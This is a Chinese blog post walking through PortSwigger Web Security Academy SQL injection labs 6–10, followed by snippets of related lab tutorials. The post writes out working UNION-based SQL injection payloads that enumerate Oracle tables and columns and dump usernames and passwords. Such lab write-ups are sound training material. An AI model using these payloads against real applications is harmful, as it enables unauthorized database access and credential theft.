burp靶场--sql通关

最新推荐文章于 2025-02-17 17:45:12 发布
最新推荐文章于 2025-02-17 17:45:12 发布
阅读量1.9k 收藏 42
点赞数 60
分类专栏: SQL注入 数据库 文章标签: sql oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_89268757/article/details/145098364
版权

burp靶场

All labs | Web Security Academy

第六关:列出 Oracle 上的数据库内容

1.本关需要利用Oracle数据库特性,自带一张表dual

判断列

order by 3--+        页面报错

order by 2--+        页面未报错

说明有2列

2.爆出所有dual表中的所有表,寻找关于users的表

union select null,table_name from all_tables--+

3.爆出 'USERS_JJUFIY' 表中的所有字段,并且寻找关于username和password的字段

union select null,column_name from all_tab_columns where table_name='USERS_JJUFIY' --+

4.查询USERNAME_BDITGO和PASSWORD_OGCAMT字段中的具体数据

union select USERNAME_BDITGO,PASSWORD_OGCAMT from USERS_JJUFIY--+

5.拿着报出来的用户名和密码去登录就可以过关

第七关:确定查询返回的列

本关呢第一眼看的时候很懵,确定查询返回的列?什么意思?不知道?这个时候要是很懵那就对了,因为你习惯性的将问题复杂化,简单理解一下,确定查询返回的列,不就是确定确定有多少列吗?先确定有多少列,然后再将它以空的形式输出不就解决了吗?

话不多说,动手操作是真理

1.先确定返回的列数

order by 3--+        页面正常

order by 2--+        页面报错

说明有三列

可以明显的看到所展示的那么多行已经变少了

2.不要慌,他不是失踪了,将所有的列用空的方式将他展示出来,就可以轻松过关了

union select null,null,null--+

提示:本关给的提示是利用空的方式一个一个试,但是本人觉得那样浪费时间,简单化一点,直接确定它有几列,然后直接输出会快一点!

第八关:查找文本的列

有了上一关的经验,这一关不是手拿把掐嘛!

唯一不同的是查询返回的列中有一列是有文本的,而这个文本是靶场随机生成的

1.话不多说,直接用'order by'先确定它有多少列

order by 3--+        页面正常

order by 2--+        页面报错

order by 4--+        页面报错

这里的列数,在页面未报错的情况下尽量在加一个数或减一个数再试一下,让值更加准确一点

2.确定了具体的列数,这个时候我们就要拿随机生成的文本一个位置一个位置的试了,因为你不确定那个位置会有文本,试的时候不要忘记用空来填补另两个列

union select 'dT92mk',null,null--+

页面报错,不是第一个

union select null,'dT92mk',null--+

页面正常,说明文本在第二个列,直接过关

第九关:从其他表中检索数据

题目中已经明确的提示了数据库包含了一个名为users的不同表,并且还包含usernamepassword 的列,表,表中的字段,信息都有了,那我们就只需要,查询出表中字段的具体信息

union select username,password from users--+

直接拿着用户名跟密码去登录

第十关:检索单个列中的多个值

本关跟上一关貌似差不多,但是细心的小伙伴会发现,会有一点点的不同

1.直接先查询表中字段的所有信息

union select username,password from users--+

直接利用上一关的方式发现页面报错,没毛病啊,这个时候,冷静一下,我们仔细的看一下题目“检索单个列中的多个值”,是多个值,而我们一直查询的是列中的单个值,那么这题呢,就是我们要把多个值输出在一个列中

2.这个时候我们就需要用到拼接的方式,将输出的值看做字符串,并且拼接起来

union select null,username || '~' || password from users--+


注意:这里是以字符串的形式用~号进行拼接。

||是sql中常用的字符串拼接操作符

3.拿着用户名跟密码直接去进行登录,就可以过关

sqli-labs SQL注入靶场通关手册
2302_78345978的博客
05-18 1822
在name=后加上'and (length(database())=8)--+发送到重映器,进行修改:首先在User-Agent后加 ’ 查看报错信息。因为cookie需要登录才能验证,所以放行,后刷新页面,抓取cookie。进行HTTP User-Agent 注入,选择less-18。进行post传参无回显的布尔类型盲注,选择less-15。(输入账号密码,提交后,在burp上查看截获的数据)先猜数据库名字长度,>=8时不报错,>=9时报错。进行post传参的字符型注入,选择less-13。
SQL注入-靶场通关 Less 1-21
weixin_72104324的博客
07-03 1247
打开Burp工具--打开内嵌浏览器--进入靶场第六关--打开拦截--输入?id=1',如果是正确的,说明不存在注入点,如果错误,说明存在注入点,这里是错误的,需要加上注释--+,在回车看结果是正确的,说明找到了注入点。工具,打开内嵌浏览器,打开拦截,输入http://127.0.0.1/sqli-labs-master/Less-9,然后发送到。id=1'--+,后面都注释了,单引号不闭合,报错说明是数字型SQL注入。设置休眠时间为10s,如果执行SQL语句就会加载,说明正确,存在注入点。
burp靶场通关教程1
逍遥小哥的博客
10-12 1191
因为这是个普通用户的凭据,这里显示false,那么我们访问管理页面把后面的admin=false粘上去 并改为true(如果有admin=就不用粘贴了,我这访问admin管理面本cookie里面没有admin=false)我们先访问robots.txt 这里提示里面存在管理面板的路径(没有做鉴权,通过不受保护的管理功能这个提示,应该直接访问管理面板路径就可以删除carlos用户了)第一这个--是注释,其次为什么要给administrator后面加单引号,因为这是字符串要闭合,不闭合就报错了。
burpsuit 靶场(OAuth authentication categories)
wanan的博客
01-23 728
burpsuit 靶场(OAuth authentication categories)
pikachu靶场通关全流程(超详细),看这一篇就够了!
最新发布
lza20001103的博客
02-17 2530
pikachu靶场通关全流程(超详细),看这一篇就够了!
burp靶场sql通关
2401_89268757的博客
01-11 620
sql注入练习
Pikachu靶场通关记录(详细)
热门推荐
ak.Gh0st的博客
10-31 1万+
Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。
sqli-labs-master靶场[超详细通关教程,通关攻略~!]
muyuchen110的博客
07-22 3213
sqli-labs-master[超详细通关教程,通关攻略~!](附解题思路及各注入方法解析)-------持续更新关卡通关教程!!!!
sql注入靶场通关
xiaoyang0475的博客
07-03 1385
打开小皮,并打开Apache2.4.39 和 MySQL5.7.26打开网站创建网络 域名为sqli-labs 端口为8989 PHP版本5.3.29 根目录与WWW文件在同一路径,进行创建。打开创建好的网站打开网站就可以进行sqli-labs靶场通关啦接下来让我们开始进行打靶吧!输入正常数据查看回显通过判断是否存在注入点和注入类型来进行打靶判断注入点?id=1查看是否存在注入点确定存在注入点将后面进行注释查看页面回显页面回显正常判断注入方式为字符型注入。
sqli-labs SQL注入靶场通关手册(1-21)
2301_76594872的博客
07-02 1137
前面需要准备打开phpstudy我这里是老版:phpstudy若3306端口被占用,win+r,cmd,命令行提示符里输入netstat -ano | findstr xxxx //xxxx为查询的端口号,找到pid,在任务管理器界面,选择对应的pid,详细信息结束进程同时需要再网页上打开跳转到如下界面:配置成功。
Burp Suite靶场练习——暴力破解(pikache靶场
p36273的博客
06-05 8994
靶场一共有4关,现我们就开始通关吧。Token 是在服务端产生的。如果前端使用用户名/密码向服务端请求认证,服务端认证成功,那么在服务端会返回 Token 给前端。前端可以在每次请求的时候带上 Token 证明自己的合法地位。如果这个 Token 在服务端持久化(比如存入数据库),那它就是一个永久的身份令牌。Token 完全由应用管理,所以它可以避开同源策略Token 可以避免 CSRF 攻击Token 可以是无状态的,可以在多个服务间共享BurpSuite爆破的几种模式攻击模式。
burp 官方靶场全程操作笔记 第一章节
2301_78362619的博客
01-25 2491
burp官方实验室 笔记
burp靶场
qq_61740845的博客
09-18 1098
经过观察发现是通过url进行传参的,它让我们找到所有的隐藏商品才能过关经过测试我知道了他是以单引号进行的闭合,而且在我们加上注释以后页面出现了一些隐藏商品那我们就想办法让前面的的值等于所有然后在注释掉后面,就可以显示所有隐藏商品了。
burpsuite 靶场通关笔记
weixin_44807430的博客
05-19 196
sqli-labs靶场分析
RestoreJustice的博客
03-18 3328
这里是 基于WAF的一个错误引起的SQL注入,源代码level 29文件夹里有三个php文件,默认访问这个文件夹的index.php但这个文件是没有接入“WAF”的。在测试符号后面添加and sleep(5) --+,如果成功闭合前面的语句,则会执行sleep(5),利用延时注入的原理判断闭合方式。来看看第二种格式,第二种格式除了能像第一种格式一样得到数组内元素的值外,还能得到元素的索引值,并保存到$key变量中,如果数组的索引值未经过人工设定,则返回系统默认的设定值。第一个id的值符合规则,WAF放行。
burpsuit 靶场( HTTP request smuggling)
wanan的博客
01-22 2459
burpsuit 靶场( HTTP request smuggling)
pikachu 靶场通关(全)
m0_59598029的博客
04-10 4270
发现同一个验证码我们重复使用了多次,返回的结果时用户名或密码错误,并没有提示验证码失效,也就是只要我们这个页面不刷新,就可以一直用这个验证码,那就跟第一关一样,直接ctrl+i拿去爆破,得到了跟上面一样的用户名跟密码。//union语句聚合两个查询的内容,由于页面只返回一行,所以在前面的输入一个不存在的id,我这里直接使-号,以返回我们输入的内容,这里页面上将1,2都返回了,得知两个字段都有回显,经过查找发现是在密码输入框的下方多一个隐藏的输入框,记录的是token的信息,那么直接拿去burp上开始爆破!
SQL注入靶场通关
龙卷风摧毁停车场
04-08 1万+
SQL注入靶场通关 SQL注入简介 SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL注入原理 SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,使web服务器执行恶意命
搭建本地SQL注入靶场sqli-labs实战教程
- 结合手动测试(如构造SQL查询)和工具(如Burp Suite,SQLMap)的使用,以加深理解和提高技能。 sqli-labs的使用不仅仅是完成各个关卡,更重要的是通过实践来理解SQL注入的工作原理,掌握防御技巧,并提升安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值